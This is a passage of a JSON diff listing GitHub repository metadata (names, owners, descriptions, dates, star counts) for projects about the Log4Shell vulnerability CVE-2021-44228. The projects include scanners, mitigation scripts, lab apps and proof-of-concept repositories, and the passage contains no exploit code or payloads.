+ "created_at": "2021-12-16T13:05:38Z",
+ "updated_at": "2021-12-16T15:50:45Z",
+ "pushed_at": "2021-12-16T14:34:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "java",
+ "log4j2",
+ "spring"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438998103,
+ "name": "Burp-Log4j-HammerTime",
+ "full_name": "DXC-StrikeForce\/Burp-Log4j-HammerTime",
+ "owner": {
+ "login": "DXC-StrikeForce",
+ "id": 77387831,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77387831?v=4",
+ "html_url": "https:\/\/github.com\/DXC-StrikeForce"
+ },
+ "html_url": "https:\/\/github.com\/DXC-StrikeForce\/Burp-Log4j-HammerTime",
+ "description": "Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046",
+ "fork": false,
+ "created_at": "2021-12-16T13:25:03Z",
+ "updated_at": "2022-01-08T17:32:58Z",
+ "pushed_at": "2021-12-16T17:02:30Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439018822,
+ "name": "log4j-filescan",
+ "full_name": "andalik\/log4j-filescan",
+ "owner": {
+ "login": "andalik",
+ "id": 12278569,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12278569?v=4",
+ "html_url": "https:\/\/github.com\/andalik"
+ },
+ "html_url": "https:\/\/github.com\/andalik\/log4j-filescan",
+ "description": "Scanner recursivo de arquivos desenvolvido em Python 3 para localização e varredura de versões vulneráveis do Log4j2, contemplando análise interna de arquivos JAR (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 e CVE-2021-44832)",
+ "fork": false,
+ "created_at": "2021-12-16T14:29:05Z",
+ "updated_at": "2022-03-05T22:52:28Z",
+ "pushed_at": "2022-03-05T23:01:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439019569,
+ "name": "CVE-2021-44228-Apache-Log4j",
+ "full_name": "lonecloud\/CVE-2021-44228-Apache-Log4j",
+ "owner": {
+ "login": "lonecloud",
+ "id": 17854123,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17854123?v=4",
+ "html_url": "https:\/\/github.com\/lonecloud"
+ },
+ "html_url": "https:\/\/github.com\/lonecloud\/CVE-2021-44228-Apache-Log4j",
+ "description": "CVE-2021-44228-Apache-Log4j",
+ "fork": false,
+ "created_at": "2021-12-16T14:31:14Z",
+ "updated_at": "2021-12-16T14:31:45Z",
+ "pushed_at": "2021-12-16T14:31:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439030654,
+ "name": "CVE-2021-44228",
+ "full_name": "gyaansastra\/CVE-2021-44228",
+ "owner": {
+ "login": "gyaansastra",
+ "id": 35690123,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35690123?v=4",
+ "html_url": "https:\/\/github.com\/gyaansastra"
+ },
+ "html_url": "https:\/\/github.com\/gyaansastra\/CVE-2021-44228",
+ "description": "Log4Shell CVE-2021-44228 Vulnerability Scanner and POC",
+ "fork": false,
+ "created_at": "2021-12-16T15:04:23Z",
+ "updated_at": "2021-12-21T05:46:51Z",
+ "pushed_at": "2021-12-21T07:03:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439060792,
+ "name": "CVE-2021-44228",
+ "full_name": "axisops\/CVE-2021-44228",
+ "owner": {
+ "login": "axisops",
+ "id": 5512152,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5512152?v=4",
+ "html_url": "https:\/\/github.com\/axisops"
+ },
+ "html_url": "https:\/\/github.com\/axisops\/CVE-2021-44228",
+ "description": "log4j mitigation work",
+ "fork": false,
+ "created_at": "2021-12-16T16:42:44Z",
+ "updated_at": "2021-12-16T16:42:44Z",
+ "pushed_at": "2021-12-16T16:42:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439071699,
+ "name": "MyLog4Shell",
+ "full_name": "kal1gh0st\/MyLog4Shell",
+ "owner": {
+ "login": "kal1gh0st",
+ "id": 56889513,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56889513?v=4",
+ "html_url": "https:\/\/github.com\/kal1gh0st"
+ },
+ "html_url": "https:\/\/github.com\/kal1gh0st\/MyLog4Shell",
+ "description": "Simple Python 3 script to detect the \"Log4j\" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading",
+ "fork": false,
+ "created_at": "2021-12-16T17:21:22Z",
+ "updated_at": "2022-02-25T00:05:36Z",
+ "pushed_at": "2021-12-30T23:42:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439071959,
+ "name": "log4shell",
+ "full_name": "hozyx\/log4shell",
+ "owner": {
+ "login": "hozyx",
+ "id": 96227119,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96227119?v=4",
+ "html_url": "https:\/\/github.com\/hozyx"
+ },
+ "html_url": "https:\/\/github.com\/hozyx\/log4shell",
+ "description": "Applications that are vulnerable to the log4j CVE-2021-44228\/45046 issue may be detectable by scanning jar, war, ear, zip files to search for the presence of JndiLookup.class.",
+ "fork": false,
+ "created_at": "2021-12-16T17:22:17Z",
+ "updated_at": "2021-12-16T19:22:07Z",
+ "pushed_at": "2021-12-16T19:22:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439077328,
+ "name": "Log4J_checker",
+ "full_name": "andypitcher\/Log4J_checker",
+ "owner": {
+ "login": "andypitcher",
+ "id": 12878731,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12878731?v=4",
+ "html_url": "https:\/\/github.com\/andypitcher"
+ },
+ "html_url": "https:\/\/github.com\/andypitcher\/Log4J_checker",
+ "description": "Log4J checker for Apache CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-16T17:41:47Z",
+ "updated_at": "2023-05-07T15:43:13Z",
+ "pushed_at": "2021-12-16T18:28:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439093094,
+ "name": "log4j-cve-2021-44228",
+ "full_name": "Vulnmachines\/log4j-cve-2021-44228",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/log4j-cve-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-16T18:42:08Z",
+ "updated_at": "2021-12-16T18:42:11Z",
+ "pushed_at": "2021-12-16T18:42:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439112800,
+ "name": "CVE-2021-44228-Apache-Log4j-Rce",
+ "full_name": "kannthu\/CVE-2021-44228-Apache-Log4j-Rce",
+ "owner": {
+ "login": "kannthu",
+ "id": 22802035,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22802035?v=4",
+ "html_url": "https:\/\/github.com\/kannthu"
+ },
+ "html_url": "https:\/\/github.com\/kannthu\/CVE-2021-44228-Apache-Log4j-Rce",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-16T20:02:09Z",
+ "updated_at": "2021-12-16T20:05:17Z",
+ "pushed_at": "2021-12-16T20:05:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439129728,
+ "name": "CVE-2021-44228",
+ "full_name": "Kr0ff\/CVE-2021-44228",
+ "owner": {
+ "login": "Kr0ff",
+ "id": 35173514,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35173514?v=4",
+ "html_url": "https:\/\/github.com\/Kr0ff"
+ },
+ "html_url": "https:\/\/github.com\/Kr0ff\/CVE-2021-44228",
+ "description": "Log4Shell Proof of Concept (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-16T21:19:17Z",
+ "updated_at": "2023-08-15T12:51:08Z",
+ "pushed_at": "2022-04-21T13:23:40Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439151562,
+ "name": "log4shell4shell",
+ "full_name": "suuhm\/log4shell4shell",
+ "owner": {
+ "login": "suuhm",
+ "id": 11504990,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11504990?v=4",
+ "html_url": "https:\/\/github.com\/suuhm"
+ },
+ "html_url": "https:\/\/github.com\/suuhm\/log4shell4shell",
+ "description": "Log4shell - Multi-Toolkit. Find, Fix & Test possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test\/attack environment on shell",
+ "fork": false,
+ "created_at": "2021-12-16T23:13:09Z",
+ "updated_at": "2022-04-23T23:26:29Z",
+ "pushed_at": "2021-12-23T00:09:08Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "checker",
+ "hacking",
+ "linux",
+ "log4j",
+ "log4j2",
+ "log4shell",
+ "macos",
+ "patch",
+ "penetration-testing",
+ "pentesting",
+ "proof-of-concept",
+ "scanner",
+ "security",
+ "tomcat",
+ "vulnerability-scanners",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439179362,
+ "name": "log4shell-test-exploit",
+ "full_name": "wajda\/log4shell-test-exploit",
+ "owner": {
+ "login": "wajda",
+ "id": 795479,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/795479?v=4",
+ "html_url": "https:\/\/github.com\/wajda"
+ },
+ "html_url": "https:\/\/github.com\/wajda\/log4shell-test-exploit",
+ "description": "Test exploit of CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-17T01:50:22Z",
+ "updated_at": "2021-12-23T13:48:51Z",
+ "pushed_at": "2021-12-23T13:48:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439208776,
+ "name": "log4shell-poc-lab",
+ "full_name": "obscuritylabs\/log4shell-poc-lab",
+ "owner": {
+ "login": "obscuritylabs",
+ "id": 36056630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36056630?v=4",
+ "html_url": "https:\/\/github.com\/obscuritylabs"
+ },
+ "html_url": "https:\/\/github.com\/obscuritylabs\/log4shell-poc-lab",
+ "description": "A lab demonstration of the log4shell vulnerability: CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-17T04:20:40Z",
+ "updated_at": "2023-07-23T00:49:26Z",
+ "pushed_at": "2021-12-17T17:21:50Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": true,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 439217985,
+ "name": "vCenter-Server-Workaround-Script-CVE-2021-44228",
+ "full_name": "Fazmin\/vCenter-Server-Workaround-Script-CVE-2021-44228",
+ "owner": {
+ "login": "Fazmin",
+ "id": 1432117,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1432117?v=4",
+ "html_url": "https:\/\/github.com\/Fazmin"
+ },
+ "html_url": "https:\/\/github.com\/Fazmin\/vCenter-Server-Workaround-Script-CVE-2021-44228",
+ "description": "Script - Workaround instructions to address CVE-2021-44228 in vCenter Server ",
+ "fork": false,
+ "created_at": "2021-12-17T05:14:05Z",
+ "updated_at": "2023-03-19T00:01:25Z",
+ "pushed_at": "2022-01-13T14:19:13Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439234639,
+ "name": "CVE-2021-44228-Log4j-PoC-RCE",
+ "full_name": "Grupo-Kapa-7\/CVE-2021-44228-Log4j-PoC-RCE",
+ "owner": {
+ "login": "Grupo-Kapa-7",
+ "id": 80293225,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80293225?v=4",
+ "html_url": "https:\/\/github.com\/Grupo-Kapa-7"
+ },
+ "html_url": "https:\/\/github.com\/Grupo-Kapa-7\/CVE-2021-44228-Log4j-PoC-RCE",
+ "description": "PoC RCE Log4j CVE-2021-4428 para pruebas",
+ "fork": false,
+ "created_at": "2021-12-17T06:34:51Z",
+ "updated_at": "2021-12-17T06:38:25Z",
+ "pushed_at": "2022-01-04T16:58:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 439263342,
+ "name": "CVE-2021-44228_scanner",
+ "full_name": "rohankumardubey\/CVE-2021-44228_scanner",
+ "owner": {
+ "login": "rohankumardubey",
+ "id": 82864904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82864904?v=4",
+ "html_url": "https:\/\/github.com\/rohankumardubey"
+ },
+ "html_url": "https:\/\/github.com\/rohankumardubey\/CVE-2021-44228_scanner",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-17T08:32:20Z",
+ "updated_at": "2021-12-17T08:32:31Z",
+ "pushed_at": "2021-12-17T08:32:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439273329,
+ "name": "Fix-Log4j-PowershellScript",
+ "full_name": "sysadmin0815\/Fix-Log4j-PowershellScript",
+ "owner": {
+ "login": "sysadmin0815",
+ "id": 81157346,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81157346?v=4",
+ "html_url": "https:\/\/github.com\/sysadmin0815"
+ },
+ "html_url": "https:\/\/github.com\/sysadmin0815\/Fix-Log4j-PowershellScript",
+ "description": "Log4Shell mitigation (CVE-2021-44228) - search and remove JNDI class from *log4j*.jar files on the system with Powershell (Windows)",
+ "fork": false,
+ "created_at": "2021-12-17T09:09:56Z",
+ "updated_at": "2024-05-08T09:50:15Z",
+ "pushed_at": "2021-12-23T10:44:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439273557,
+ "name": "log4j-lookups-vulnerability",
+ "full_name": "RenYuH\/log4j-lookups-vulnerability",
+ "owner": {
+ "login": "RenYuH",
+ "id": 25149383,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25149383?v=4",
+ "html_url": "https:\/\/github.com\/RenYuH"
+ },
+ "html_url": "https:\/\/github.com\/RenYuH\/log4j-lookups-vulnerability",
+ "description": "Log4j2 Vulnerability (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-17T09:10:50Z",
+ "updated_at": "2021-12-17T09:52:30Z",
+ "pushed_at": "2021-12-17T09:52:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439288883,
+ "name": "py-log4shellscanner",
+ "full_name": "scheibling\/py-log4shellscanner",
+ "owner": {
+ "login": "scheibling",
+ "id": 24367830,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24367830?v=4",
+ "html_url": "https:\/\/github.com\/scheibling"
+ },
+ "html_url": "https:\/\/github.com\/scheibling\/py-log4shellscanner",
+ "description": "Scanner for the Log4j vulnerability dubbed Log4Shell (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-17T10:06:07Z",
+ "updated_at": "2021-12-17T10:40:07Z",
+ "pushed_at": "2021-12-17T10:40:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439296638,
+ "name": "CVE-2021-44228",
+ "full_name": "zaneef\/CVE-2021-44228",
+ "owner": {
+ "login": "zaneef",
+ "id": 54664755,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54664755?v=4",
+ "html_url": "https:\/\/github.com\/zaneef"
+ },
+ "html_url": "https:\/\/github.com\/zaneef\/CVE-2021-44228",
+ "description": "Log4Shell (CVE-2021-44228): Descrizione, Exploitation e Mitigazione",
+ "fork": false,
+ "created_at": "2021-12-17T10:36:16Z",
+ "updated_at": "2021-12-21T11:08:13Z",
+ "pushed_at": "2021-12-21T08:50:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "jndi-exploit",
+ "jndi-lookups",
+ "log4j2",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439330776,
+ "name": "log4j-quick-scan",
+ "full_name": "metodidavidovic\/log4j-quick-scan",
+ "owner": {
+ "login": "metodidavidovic",
+ "id": 75225635,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75225635?v=4",
+ "html_url": "https:\/\/github.com\/metodidavidovic"
+ },
+ "html_url": "https:\/\/github.com\/metodidavidovic\/log4j-quick-scan",
+ "description": "Scan your IP network and determine hosts with possible CVE-2021-44228 vulnerability in log4j library.",
+ "fork": false,
+ "created_at": "2021-12-17T12:49:59Z",
+ "updated_at": "2021-12-21T14:51:50Z",
+ "pushed_at": "2021-12-21T14:51:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439385857,
+ "name": "log4shell-iocs",
+ "full_name": "WatchGuard-Threat-Lab\/log4shell-iocs",
+ "owner": {
+ "login": "WatchGuard-Threat-Lab",
+ "id": 31286181,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31286181?v=4",
+ "html_url": "https:\/\/github.com\/WatchGuard-Threat-Lab"
+ },
+ "html_url": "https:\/\/github.com\/WatchGuard-Threat-Lab\/log4shell-iocs",
+ "description": "A collection of IOCs for CVE-2021-44228 also known as Log4Shell",
+ "fork": false,
+ "created_at": "2021-12-17T15:58:14Z",
+ "updated_at": "2021-12-17T15:59:33Z",
+ "pushed_at": "2021-12-17T15:58:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439393950,
+ "name": "log4j-patched",
+ "full_name": "Aschen\/log4j-patched",
+ "owner": {
+ "login": "Aschen",
+ "id": 4447392,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4447392?v=4",
+ "html_url": "https:\/\/github.com\/Aschen"
+ },
+ "html_url": "https:\/\/github.com\/Aschen\/log4j-patched",
+ "description": "Provide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it yourself",
+ "fork": false,
+ "created_at": "2021-12-17T16:26:12Z",
+ "updated_at": "2021-12-19T18:29:10Z",
+ "pushed_at": "2021-12-17T18:41:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439409726,
+ "name": "cve-2021-44228",
+ "full_name": "Nikolas-Charalambidis\/cve-2021-44228",
+ "owner": {
+ "login": "Nikolas-Charalambidis",
+ "id": 21295587,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21295587?v=4",
+ "html_url": "https:\/\/github.com\/Nikolas-Charalambidis"
+ },
+ "html_url": "https:\/\/github.com\/Nikolas-Charalambidis\/cve-2021-44228",
+ "description": "A simple simulation of the infamous CVE-2021-44228 issue.",
+ "fork": false,
+ "created_at": "2021-12-17T17:23:47Z",
+ "updated_at": "2022-12-02T02:40:53Z",
+ "pushed_at": "2021-12-18T13:45:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "java",
+ "java-11",
+ "log4j",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439420251,
+ "name": "detect-log4j-exploitable",
+ "full_name": "m0rath\/detect-log4j-exploitable",
+ "owner": {
+ "login": "m0rath",
+ "id": 17716312,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17716312?v=4",
+ "html_url": "https:\/\/github.com\/m0rath"
+ },
+ "html_url": "https:\/\/github.com\/m0rath\/detect-log4j-exploitable",
+ "description": "CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-17T18:03:50Z",
+ "updated_at": "2021-12-20T17:53:14Z",
+ "pushed_at": "2021-12-20T17:53:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439430099,
+ "name": "CVE-2021-44228-VULN-APP",
+ "full_name": "nu11secur1ty\/CVE-2021-44228-VULN-APP",
+ "owner": {
+ "login": "nu11secur1ty",
+ "id": 3677559,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3677559?v=4",
+ "html_url": "https:\/\/github.com\/nu11secur1ty"
+ },
+ "html_url": "https:\/\/github.com\/nu11secur1ty\/CVE-2021-44228-VULN-APP",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-17T18:45:19Z",
+ "updated_at": "2023-09-28T11:34:12Z",
+ "pushed_at": "2023-02-22T12:12:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439444176,
+ "name": "log4j-docker",
+ "full_name": "ankur-katiyar\/log4j-docker",
+ "owner": {
+ "login": "ankur-katiyar",
+ "id": 7027426,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7027426?v=4",
+ "html_url": "https:\/\/github.com\/ankur-katiyar"
+ },
+ "html_url": "https:\/\/github.com\/ankur-katiyar\/log4j-docker",
+ "description": "Docker images and k8s YAMLs for Log4j Vulnerability POC (Log4j (CVE-2021-44228 RCE Vulnerability)",
+ "fork": false,
+ "created_at": "2021-12-17T19:50:40Z",
+ "updated_at": "2022-04-21T01:41:08Z",
+ "pushed_at": "2021-12-20T16:39:28Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439447817,
+ "name": "Log4j-JNDIServer",
+ "full_name": "immunityinc\/Log4j-JNDIServer",
+ "owner": {
+ "login": "immunityinc",
+ "id": 17729016,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17729016?v=4",
+ "html_url": "https:\/\/github.com\/immunityinc"
+ },
+ "html_url": "https:\/\/github.com\/immunityinc\/Log4j-JNDIServer",
+ "description": "This project will help to test the Log4j CVE-2021-44228 vulnerability.",
+ "fork": false,
+ "created_at": "2021-12-17T20:07:12Z",
+ "updated_at": "2022-06-30T02:03:56Z",
+ "pushed_at": "2021-12-22T20:17:36Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 439496578,
+ "name": "PowerShell-Log4J-Scanner",
+ "full_name": "DANSI\/PowerShell-Log4J-Scanner",
+ "owner": {
+ "login": "DANSI",
+ "id": 4057240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4057240?v=4",
+ "html_url": "https:\/\/github.com\/DANSI"
+ },
+ "html_url": "https:\/\/github.com\/DANSI\/PowerShell-Log4J-Scanner",
+ "description": "can find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046",
